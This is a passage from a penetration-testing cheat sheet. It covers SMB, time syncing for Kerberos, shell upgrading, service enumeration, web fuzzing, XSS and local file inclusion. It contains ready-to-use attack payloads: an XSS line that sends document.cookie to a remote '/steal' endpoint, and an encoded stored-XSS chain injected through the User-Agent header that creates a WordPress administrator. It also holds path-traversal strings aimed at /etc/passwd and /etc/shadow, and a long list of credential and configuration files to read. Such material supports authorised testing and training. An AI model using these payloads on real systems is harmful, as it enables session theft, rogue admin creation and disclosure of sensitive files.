\u003cUSERNAME\u003e%\u003cPASSWORD\u003e\nsmbclient -U \"\u003cUSERNAME\u003e\" -L \\\\\\\\\u003cRHOST\u003e\\\\\nsmbclient //\u003cRHOST\u003e/\u003cSHARE\u003e\nsmbclient //\u003cRHOST\u003e/\u003cSHARE\u003e -U \u003cUSERNAME\u003e\nsmbclient //\u003cRHOST\u003e/SYSVOL -U \u003cUSERNAME\u003e%\u003cPASSWORD\u003e\nsmbclient \"\\\\\\\\\u003cRHOST\u003e\\\u003cSHARE\u003e\"\nsmbclient \\\\\\\\\u003cRHOST\u003e\\\\\u003cSHARE\u003e -U '\u003cUSERNAME\u003e' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000\nsmbclient --no-pass //\u003cRHOST\u003e/\u003cSHARE\u003e\n```\n\n##### Download multiple files at once\n\n```c\nmask \"\"\nrecurse ON\nprompt OFF\nmget *\n```\n\n#### SSH\n\n```c\nssh user@\u003cRHOST\u003e -oKexAlgorithms=+diffie-hellman-group1-sha1\n```\n\n#### Time and Date\n\n##### Get the Server Time\n\n```c\nsudo nmap -sU -p 123 --script ntp-info \u003cRHOST\u003e\n```\n\n##### Stop 
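virtualbox-guest-utils to stop syncing Time

Before touching the clock it helps to know how far off it is. Kerberos rejects requests whose timestamp differs from the KDC clock by more than five minutes (KRB_AP_ERR_SKEW), and when 123/UDP is filtered the `Date:` header of any HTTP response from the target gives its clock to the second. The following is an added example, not part of the original cheat sheet: it parses an IMF-fixdate header into a Unix timestamp without relying on GNU `date -d`, computes the skew against the local clock and says whether Kerberos will accept it. The header line and the timestamps used in the comments are constructed.

```bash
#!/usr/bin/env bash
# Added example: measure clock skew against a target before using Kerberos.
# The KDC tolerates 300 s by default; larger skew yields KRB_AP_ERR_SKEW.

# month_number NAME: Jan -> 1 ... Dec -> 12
month_number() {
  case "$1" in
    Jan) echo 1 ;; Feb) echo 2 ;; Mar) echo 3 ;; Apr) echo 4 ;;
    May) echo 5 ;; Jun) echo 6 ;; Jul) echo 7 ;; Aug) echo 8 ;;
    Sep) echo 9 ;; Oct) echo 10 ;; Nov) echo 11 ;; Dec) echo 12 ;;
    *) return 1 ;;
  esac
}

# days_from_civil Y M D: days since 1970-01-01, proleptic Gregorian
# (Howard Hinnant's algorithm, so no dependency on GNU date -d)
days_from_civil() {
  local y="$1" m="$2" d="$3" era yoe mp doy doe
  if [ "$m" -le 2 ]; then y=$((y - 1)); fi
  era=$(( (y >= 0 ? y : y - 399) / 400 ))
  yoe=$(( y - era * 400 ))
  mp=$(( m > 2 ? m - 3 : m + 9 ))
  doy=$(( (153 * mp + 2) / 5 + d - 1 ))
  doe=$(( yoe * 365 + yoe / 4 - yoe / 100 + doy ))
  echo $(( era * 146097 + doe - 719468 ))
}

# http_date_to_epoch "Fri, 20 Nov 2015 16:14:50 GMT": IMF-fixdate (RFC 7231) -> Unix epoch
http_date_to_epoch() {
  local dow day mon year time tz hh mm ss days
  read -r dow day mon year time tz <<EOF
$1
EOF
  [ "$tz" = "GMT" ] || return 1
  IFS=: read -r hh mm ss <<EOF
$time
EOF
  days=$(days_from_civil "$year" "$(month_number "$mon")" "${day#0}") || return 1
  # ${hh#0} drops a leading zero so that 08 and 09 are not parsed as octal
  echo $(( days * 86400 + ${hh#0} * 3600 + ${mm#0} * 60 + ${ss#0} ))
}

# kerberos_skew_report SERVER_EPOCH [LOCAL_EPOCH]: skew in seconds and whether a KDC would accept it
kerberos_skew_report() {
  local server="$1" now="${2:-$(date +%s)}" skew abs
  skew=$(( server - now ))
  abs=${skew#-}
  if [ "$abs" -le 300 ]; then
    echo "skew ${skew}s: within Kerberos tolerance"
  else
    echo "skew ${skew}s: too large, set the clock: sudo date -s @${server} (or sudo ntpdate <RHOST>)"
  fi
}

# skew_from_date_header "Date: ..." [LOCAL_EPOCH]: feed a raw header line, e.g. from curl -sI http://<RHOST> | grep '^Date:'
skew_from_date_header() {
  local hdr epoch
  hdr=$(printf '%s' "${1#Date: }" | tr -d '\r')
  epoch=$(http_date_to_epoch "$hdr") || return 1
  kerberos_skew_report "$epoch" "${2:-$(date +%s)}"
}
```

Run `skew_from_date_header "$(curl -sI http://<RHOST> | grep '^Date:')"` on the attacking machine; if the report says the skew is too large, stop the automatic synchronisation as described next and set the clock with one of the commands under "Options to set the Date and Time".


With the skew known, stop 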
virtualbox-guest-utils to stop syncing Time\n\n```c\nsudo /etc/init.d/virtualbox-guest-utils stop\n```\n\n##### Stop systemd-timesyncd to sync Time manually\n\n```c\nsudo systemctl stop systemd-timesyncd\n```\n\n##### Disable automatic Sync\n\n```c\nsudo systemctl disable --now chronyd\n```\n\n##### Options to set the Date and Time\n\n```c\nsudo net time -c \u003cRHOST\u003e\nsudo net time set -S \u003cRHOST\u003e\nnet time \\\\\u003cRHOST\u003e /set /y          // Windows\nsudo ntpdate \u003cRHOST\u003e\nsudo ntpdate -s \u003cRHOST\u003e\nsudo ntpdate -b -u \u003cRHOST\u003e\nsudo timedatectl set-timezone UTC\nsudo timedatectl list-timezones\nsudo timedatectl set-timezone '\u003cCOUNTRY\u003e/\u003cCITY\u003e'\nsudo timedatectl set-time 15:58:30\nsudo timedatectl set-time '2015-11-20 16:14:50'\nsudo timedatectl set-local-rtc 1\n```\n\n##### Keep in Sync with a Server\n\n```c\nwhile true; do sudo ntpdate \u003cRHOST\u003e; sleep 1; done\n```\n\n#### Tmux\n\n```c\nctrl b + w         # show windows\nctrl b + \"         # split pane horizontally\nctrl b + %         # split pane vertically\nctrl b + ,         # rename window\nctrl b + {         # swap pane with the previous one\nctrl b + }         # swap pane with the next one\nctrl b + spacebar  # switch pane layout\n```\n\nCopy \u0026 Paste\n```c\nctrl b + :    # then type: setw -g mode-keys vi\nctrl b + [    # enter copy mode\nspace         # start selection\nenter         # copy selection\nctrl b + ]    # paste\n```\n\nSearch\n```c\nctrl b + [    # enter copy mode\n/             # search forward (vi keys); ? searches backward\nn             # next match\nshift + n     # previous match\n```\n\nLogging (tmux-logging plugin)\n```c\nctrl b + shift + p    # start / stop logging\n```\n\nSave Output\n```c\nctrl b + :\ncapture-pane -S -\nctrl b + :\nsave-buffer \u003cFILE\u003e.txt\n```\n\n#### Upgrading Shells\n\n```c\npython -c 'import pty;pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\n\nctrl + z\nstty raw -echo\nfg\nEnter\nEnter\nexport TERM=xterm\n```\n\nor\n\n```c\nCtrl + z\nstty -a\nstty raw -echo;fg\nEnter\nEnter\nstty rows 37 cols 123\nexport TERM=xterm-256color\nbash\n```\n\nAlternatively:\n\n```c\nscript -q 
/dev/null -c bash\n/usr/bin/script -qc /bin/bash /dev/null\n```\n\n##### Oneliner\n\n```c\nstty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;\n```\n\n#### Fixing Staircase Effect\n\n```c\nenv reset\n```\n\nor\n\n```c\nstty onlcr\n```\n\n#### VirtualBox\n\n```c\nsudo pkill VBoxClient \u0026\u0026 VBoxClient --clipboard\n```\n\n#### virtualenv\n\n```c\nsudo apt-get install virtualenv\nvirtualenv -p python2.7 venv\n. venv/bin/activate\n```\n\n```c\npython.exe -m pip install virtualenv\npython.exe -m virtualenv venv\nvenv\\Scripts\\activate\n```\n\n### Information Gathering\n\n#### memcached\n\n\u003e  https://github.com/pd4d10/memcached-cli\n\n```c\n// memcached listens on 11211/TCP and, if enabled, 11211/UDP (the UDP service was abused in the \"memcrashed\" amplification attacks)\nnpm install -g memcached-cli\nmemcached-cli \u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e:11211\necho -en \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00stats\\r\\n\" | nc -q1 -u \u003cRHOST\u003e 11211\n\n// example output of the stats probe\nSTAT pid 21357\nSTAT uptime 41557034\nSTAT time 1519734962\n\nsudo nmap \u003cRHOST\u003e -p 11211 -sU -sS --script memcached-info\n\n// useful commands once connected (nc \u003cRHOST\u003e 11211)\nstats items\nstats cachedump 1 0\nget link\nget file\nget user\nget passwd\nget account\nget username\nget password\n```\n\n#### NetBIOS\n\n```c\nnbtscan \u003cRHOST\u003e\nnmblookup -A \u003cRHOST\u003e\n```\n\n#### Nmap\n\n```c\nsudo nmap -A -T4 -sC -sV -p- \u003cRHOST\u003e\nsudo nmap -sV -sU \u003cRHOST\u003e\nsudo nmap -A -T4 -sC -sV --script vuln \u003cRHOST\u003e\nsudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery \u003cRHOST\u003e\nsudo nmap -sC -sV -p- --scan-delay 5s \u003cRHOST\u003e\nsudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='\u003cDOMAIN\u003e' \u003cRHOST\u003e\nls -lh /usr/share/nmap/scripts/*ssh*\nlocate -r '\\.nse$' | xargs grep categories | grep 'default\\|version\\|safe' | grep smb\n```\n\n#### Port Scanning\n\n```c\nfor p in {1..65535}; do nc -vn \u003cRHOST\u003e $p -w 1 -z \u0026 done 2\u003e \u003cFILE\u003e.txt\n```\n\n```c\nexport 
ip=\u003cRHOST\u003e; for port in $(seq 1 65535); do timeout 0.01 bash -c \"\u003c/dev/tcp/$ip/$port \u0026\u0026 echo The port $port is open || echo The Port $port is closed \u003e /dev/null\" 2\u003e/dev/null || echo Connection Timeout \u003e /dev/null; done\n```\n\n#### snmpwalk\n\n```c\nsnmpwalk -c public -v1 \u003cRHOST\u003e                                // walk the whole tree with the default community string\nsnmpwalk -v2c -c public \u003cRHOST\u003e 1.3.6.1.2.1.4.34.1.3          // IP addresses (ipAddressIfIndex)\nsnmpwalk -v2c -c public \u003cRHOST\u003e .1\nsnmpwalk -v2c -c public \u003cRHOST\u003e nsExtendObjects               // net-snmp extend scripts, may leak command lines\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.4.1.77.1.2.25          // Windows user accounts\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.2.1.25.4.2.1.2         // running processes (hrSWRunName)\nsnmpwalk -c public -v1 \u003cRHOST\u003e .1.3.6.1.2.1.1.5               // hostname (sysName)\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.4.1.77.1.2.3.1.1       // Windows services (svSvcName)\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.4.1.77.1.2.27          // Windows shares (svShareName)\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.2.1.6.13.1.3           // local TCP ports (tcpConnLocalPort)\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.2.1.25.6.3.1.2         // installed software (hrSWInstalledName)\n```\n\n### Web Application Analysis\n\n#### Burp Suite\n\n```c\nCtrl+r          // Sending request to repeater\nCtrl+i          // Sending request to intruder\nCtrl+Shift+b    // base64 encoding\nCtrl+Shift+u    // URL decoding\n```\n\n#### Set Proxy Environment Variables\n\n```c\nexport HTTP_PROXY=http://localhost:8080\nexport HTTPS_PROXY=http://localhost:8080    // the proxy itself speaks plain HTTP even for HTTPS targets\n```\n\n#### cadaver\n\n```c\ncadaver http://\u003cRHOST\u003e/\u003cWEBDAV_DIRECTORY\u003e/\n```\n\n```c\ndav:/\u003cWEBDAV_DIRECTORY\u003e/\u003e cd C\ndav:/\u003cWEBDAV_DIRECTORY\u003e/C/\u003e ls\ndav:/\u003cWEBDAV_DIRECTORY\u003e/C/\u003e put \u003cFILE\u003e\n```\n\n#### Cross-Site Scripting (XSS)\n\n```c\n\u003csCrIpt\u003ealert(1)\u003c/ScRipt\u003e\n\u003cscript\u003ealert('XSS');\u003c/script\u003e\n\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\u003cscript\u003edocument.querySelector('#foobar-title').textContent = '\u003cTEXT\u003e'\u003c/script\u003e\n\u003cscript\u003efetch('https://\u003cRHOST\u003e/steal?cookie=' + 
btoa(document.cookie));\u003c/script\u003e\n\u003cscript\u003euser.changeEmail('user@domain');\u003c/script\u003e\n\u003ciframe src=file:///etc/passwd height=1000px width=1000px\u003e\u003c/iframe\u003e\n\u003cimg src='http://\u003cRHOST\u003e'/\u003e\n```\n\n##### XSS client-Side Attack\n\n###### Request Example\n\n```c\n\u003ca href=\"http://\u003cRHOST\u003e/send_btc?account=\u003cUSERNAME\u003e\u0026amount=100000\"\"\u003efoobar!\u003c/a\u003e\n```\n\n###### Get nonce\n\n```c\nvar ajaxRequest = new XMLHttpRequest();\nvar requestURL = \"/wp-admin/user-new.php\";\nvar nonceRegex = /ser\" value=\"([^\"]*?)\"/g;\najaxRequest.open(\"GET\", requestURL, false);\najaxRequest.send();\nvar nonceMatch = nonceRegex.exec(ajaxRequest.responseText);\nvar nonce = nonceMatch[1];\n```\n\n###### Update Payload Script\n\n```c\nvar params = \"action=createuser\u0026_wpnonce_create-user=\"+nonce+\"\u0026user_login=\u003cUSERNAME\u003e\u0026email=\u003cEMAIL\u003e\u0026pass1=\u003cPASSWORD\u003e\u0026pass2=\u003cPASSWORD\u003e\u0026role=administrator\";\najaxRequest = new XMLHttpRequest();\najaxRequest.open(\"POST\", requestURL, true);\najaxRequest.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\najaxRequest.send(params);\n```\n\n###### Compress Payload Script\n\n\u003e https://jscompress.com/\n\n```c\nvar params=\"action=createuser\u0026_wpnonce_create-user=\"+nonce+\"\u0026user_login=\u003cUSERNAME\u003e\u0026email=\u003cEMAIL\u003e\u0026pass1=\u003cPASSWORD\u003e\u0026pass2=\u003cPASSWORD\u003e\u0026role=administrator\";ajaxRequest=new XMLHttpRequest,ajaxRequest.open(\"POST\",requestURL,!0),ajaxRequest.setRequestHeader(\"Content-Type\",\"application/x-www-form-urlencoded\"),ajaxRequest.send(params);\n```\n\n##### Encoding Function\n\n```c\nfunction encode_to_javascript(string) {\n            var input = string\n            var output = '';\n            for(pos = 0; pos \u003c input.length; pos++) {\n                output += input.charCodeAt(pos);\n      
          if(pos != (input.length - 1)) {\n                    output += \",\";\n                }\n            }\n            return output;\n        }\n        \nlet encoded = encode_to_javascript('var params=\"action=createuser\u0026_wpnonce_create-user=\"+nonce+\"\u0026user_login=\u003cUSERNAME\u003e\u0026email=\u003cEMAIL\u003e\u0026pass1=\u003cPASSWORD\u003e\u0026pass2=\u003cPASSWORD\u003e\u0026role=administrator\";ajaxRequest=new XMLHttpRequest,ajaxRequest.open(\"POST\",requestURL,!0),ajaxRequest.setRequestHeader(\"Content-Type\",\"application/x-www-form-urlencoded\"),ajaxRequest.send(params);')\nconsole.log(encoded)\n```\n\n###### Encoded Payload\n\n```c\n118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59\n```\n\n###### Execution\n\n```c\ncurl -i http://\u003cRHOST\u003e --user-agent 
\"\u003cscript\u003eeval(String.fromCharCode(118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9\n))\u003c/script\u003e\" --proxy 127.0.0.1:8080\n```\n\n#### ffuf\n\n```c\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://\u003cRHOST\u003e/FUZZ --fs \u003cNUMBER\u003e -mc all\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://\u003cRHOST\u003e/FUZZ --fw \u003cNUMBER\u003e -mc all\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://\u003cRHOST\u003e/FUZZ -mc 200,204,301,302,307,401 -o results.txt\nffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://\u003cRHOST\u003e/ -H \"Host: FUZZ.\u003cRHOST\u003e\" -fs 185\nffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://\u003cRHOST\u003e/backups/backup_2020070416FUZZ.zip\n```\n\n##### API Fuzzing\n\n```c\nffuf -u 
https://\u003cRHOST\u003e/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412\n```\n\n##### Searching for LFI\n\n```c\nffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://\u003cRHOST\u003e/admin../admin_staging/index.php?page=FUZZ -fs 15349\n```\n\n##### Fuzzing with PHP Session ID\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt  -u \"http://\u003cRHOST\u003e/admin/FUZZ.php\" -b \"PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp\" -fw 2644\n```\n\n##### Recursion\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://\u003cRHOST\u003e/cd/basic/FUZZ -recursion\n```\n\n##### File Extensions\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://\u003cRHOST\u003e/cd/ext/logs/FUZZ -e .log\n```\n\n##### Rate Limiting\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://\u003cRHOST\u003e/cd/rate/FUZZ -mc 200,429\n```\n\n##### Virtual Host Discovery\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H \"Host: FUZZ.\u003cRHOST\u003e\" -u http://\u003cRHOST\u003e -fs 1495\n```\n\n##### Massive File Extension Discovery\n\n```c\nffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://\u003cRHOST\u003e/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip\n```\n\n#### GitTools\n\n```c\n./gitdumper.sh 
http://\u003cRHOST\u003e/.git/ /PATH/TO/DUMP\n./extractor.sh /PATH/TO/DUMP/ /PATH/TO/EXTRACTED/\n```\n\n#### Gobuster\n\n```c\n-e            // extended mode that renders the full url\n-k            // skip ssl certificate validation\n-r            // follow redirects\n-s            // status codes to include (mutually exclusive with -b)\n-b            // status codes to exclude\n--wildcard    // set wildcard option\n\n$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://\u003cRHOST\u003e/\n$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://\u003cRHOST\u003e/ -x php\n$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://\u003cRHOST\u003e/ -x php,txt,html,js -e -s 200\n$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://\u003cRHOST\u003e:\u003cRPORT\u003e/ -b 200 -k --wildcard\n```\n\n##### Common File Extensions\n\n```c\ntxt,bak,php,html,js,asp,aspx\n```\n\n##### Common Picture Extensions\n\n```c\npng,jpg,jpeg,gif,bmp\n```\n\n##### POST Requests\n\n```c\ngobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://\u003cRHOST\u003e/api/ -e -s 200\n```\n\n##### DNS Recon\n\n```c\ngobuster dns -d \u003cDOMAIN\u003e -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt\ngobuster dns -d \u003cDOMAIN\u003e -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt\n```\n\n##### VHost Discovery\n\n```c\ngobuster vhost -u \u003cRHOST\u003e -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt\ngobuster vhost -u \u003cRHOST\u003e -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain\n```\n\n##### Specify User Agent\n\n```c\ngobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://\u003cRHOST\u003e/ -a Linux\n```\n\n#### Local File Inclusion 
(LFI)\n\n```c\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e.php?file=\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e.php?file=../../../../../../../../etc/passwd\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e.php?file=../../../../../../../../../../etc/passwd\n```\n\n##### Until PHP 5.3\n\n```c\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e.php?file=../../../../../../../../../../etc/passwd%00\n```\n\n##### Null Byte\n\n```c\n%00\n0x00\n```\n\n##### Encoded Traversal Strings\n\n```c\n../\n..\\\n..\\/\n%2e%2e%2f\n%252e%252e%252f\n%c0%ae%c0%ae%c0%af\n%uff0e%uff0e%u2215\n%uff0e%uff0e%u2216\n..././\n...\\.\\\n```\n\n##### php://filter Wrapper\n\n\u003e https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb\n\n\u003e https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion\n\n\u003e https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter\n\n```c\nurl=php://filter/convert.base64-encode/resource=file:////var/www/\u003cRHOST\u003e/api.php\n```\n\n```c\nhttp://\u003cRHOST\u003e/index.php?page=php://filter/convert.base64-encode/resource=index\nhttp://\u003cRHOST\u003e/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd\nbase64 -d \u003cFILE\u003e.php\n```\n\n##### Django, Rails, or Node.js Web Application Header Values\n\n```c\nAccept: ../../../../.././../../../../etc/passwd{{\nAccept: ../../../../.././../../../../etc/passwd{%0D\nAccept: ../../../../.././../../../../etc/passwd{%0A\nAccept: ../../../../.././../../../../etc/passwd{%00\nAccept: ../../../../.././../../../../etc/passwd{%0D{{\nAccept: ../../../../.././../../../../etc/passwd{%0A{{\nAccept: ../../../../.././../../../../etc/passwd{%00{{\n```\n\n##### Linux 
Files\n\n```c\n/app/etc/local.xml\n/etc/passwd\n/etc/shadow\n/etc/aliases\n/etc/anacrontab\n/etc/apache2/apache2.conf\n/etc/apache2/httpd.conf\n/etc/apache2/sites-enabled/000-default.conf\n/etc/at.allow\n/etc/at.deny\n/etc/bashrc\n/etc/bootptab\n/etc/chrootUsers\n/etc/chttp.conf\n/etc/cron.allow\n/etc/cron.deny\n/etc/crontab\n/etc/cups/cupsd.conf\n/etc/exports\n/etc/fstab\n/etc/ftpaccess\n/etc/ftpchroot\n/etc/ftphosts\n/etc/groups\n/etc/grub.conf\n/etc/hosts\n/etc/hosts.allow\n/etc/hosts.deny\n/etc/httpd/access.conf\n/etc/httpd/conf/httpd.conf\n/etc/httpd/httpd.conf\n/etc/httpd/logs/access_log\n/etc/httpd/logs/access.log\n/etc/httpd/logs/error_log\n/etc/httpd/logs/error.log\n/etc/httpd/php.ini\n/etc/httpd/srm.conf\n/etc/inetd.conf\n/etc/inittab\n/etc/issue\n/etc/knockd.conf\n/etc/lighttpd.conf\n/etc/lilo.conf\n/etc/logrotate.d/ftp\n/etc/logrotate.d/proftpd\n/etc/logrotate.d/vsftpd.log\n/etc/lsb-release\n/etc/motd\n/etc/modules.conf\n/etc/motd\n/etc/mtab\n/etc/my.cnf\n/etc/my.conf\n/etc/mysql/my.cnf\n/etc/network/interfaces\n/etc/networks\n/etc/npasswd\n/etc/passwd\n/etc/php4.4/fcgi/php.ini\n/etc/php4/apache2/php.ini\n/etc/php4/apache/php.ini\n/etc/php4/cgi/php.ini\n/etc/php4/apache2/php.ini\n/etc/php5/apache2/php.ini\n/etc/php5/apache/php.ini\n/etc/php/apache2/php.ini\n/etc/php/apache/php.ini\n/etc/php/cgi/php.ini\n/etc/php.ini\n/etc/php/php4/php.ini\n/etc/php/php.ini\n/etc/printcap\n/etc/profile\n/etc/proftp.conf\n/etc/proftpd/proftpd.conf\n/etc/pure-ftpd.conf\n/etc/pureftpd.passwd\n/etc/pureftpd.pdb\n/etc/pure-ftpd/pure-ftpd.conf\n/etc/pure-ftpd/pure-ftpd.pdb\n/etc/pure-ftpd/putreftpd.pdb\n/etc/redhat-release\n/etc/resolv.conf\n/etc/samba/smb.conf\n/etc/snmpd.conf\n/etc/ssh/ssh_config\n/etc/ssh/sshd_config\n/etc/ssh/ssh_host_dsa_key\n/etc/ssh/ssh_host_dsa_key.pub\n/etc/ssh/ssh_host_key\n/etc/ssh/ssh_host_key.pub\n/etc/sysconfig/network\n/etc/syslog.conf\n/etc/termcap\n/etc/vhcs2/proftpd/proftpd.conf\n/etc/vsftpd.chroot_list\n/etc/vsftpd.conf\n/etc/vsftpd/vsftpd.co
nf\n/etc/wu-ftpd/ftpaccess\n/etc/wu-ftpd/ftphosts\n/etc/wu-ftpd/ftpusers\n/logs/pure-ftpd.log\n/logs/security_debug_log\n/logs/security_log\n/opt/lampp/etc/httpd.conf\n/opt/xampp/etc/php.ini\n/proc/cmdline\n/proc/cpuinfo\n/proc/filesystems\n/proc/interrupts\n/proc/ioports\n/proc/meminfo\n/proc/modules\n/proc/mounts\n/proc/net/arp\n/proc/net/tcp\n/proc/net/udp\n/proc/\u003cPID\u003e/cmdline\n/proc/\u003cPID\u003e/maps\n/proc/sched_debug\n/proc/self/cwd/app.py\n/proc/self/environ\n/proc/self/net/arp\n/proc/stat\n/proc/swaps\n/proc/version\n/root/anaconda-ks.cfg\n/usr/etc/pure-ftpd.conf\n/usr/lib/php.ini\n/usr/lib/php/php.ini\n/usr/local/apache/conf/modsec.conf\n/usr/local/apache/conf/php.ini\n/usr/local/apache/log\n/usr/local/apache/logs\n/usr/local/apache/logs/access_log\n/usr/local/apache/logs/access.log\n/usr/local/apache/audit_log\n/usr/local/apache/error_log\n/usr/local/apache/error.log\n/usr/local/cpanel/logs\n/usr/local/cpanel/logs/access_log\n/usr/local/cpanel/logs/error_log\n/usr/local/cpanel/logs/license_log\n/usr/local/cpanel/logs/login_log\n/usr/local/cpanel/logs/stats_log\n/usr/local/etc/httpd/logs/access_log\n/usr/local/etc/httpd/logs/error_log\n/usr/local/etc/php.ini\n/usr/local/etc/pure-ftpd.conf\n/usr/local/etc/pureftpd.pdb\n/usr/local/lib/php.ini\n/usr/local/php4/httpd.conf\n/usr/local/php4/httpd.conf.php\n/usr/local/php4/lib/php.ini\n/usr/local/php5/httpd.conf\n/usr/local/php5/httpd.conf.php\n/usr/local/php5/lib/php.ini\n/usr/local/php/httpd.conf\n/usr/local/php/httpd.conf.ini\n/usr/local/php/lib/php.ini\n/usr/local/pureftpd/etc/pure-ftpd.conf\n/usr/local/pureftpd/etc/pureftpd.pdn\n/usr/local/pureftpd/sbin/pure-config.pl\n/usr/local/www/logs/httpd_log\n/usr/local/Zend/etc/php.ini\n/usr/sbin/pure-config.pl\n/var/adm/log/x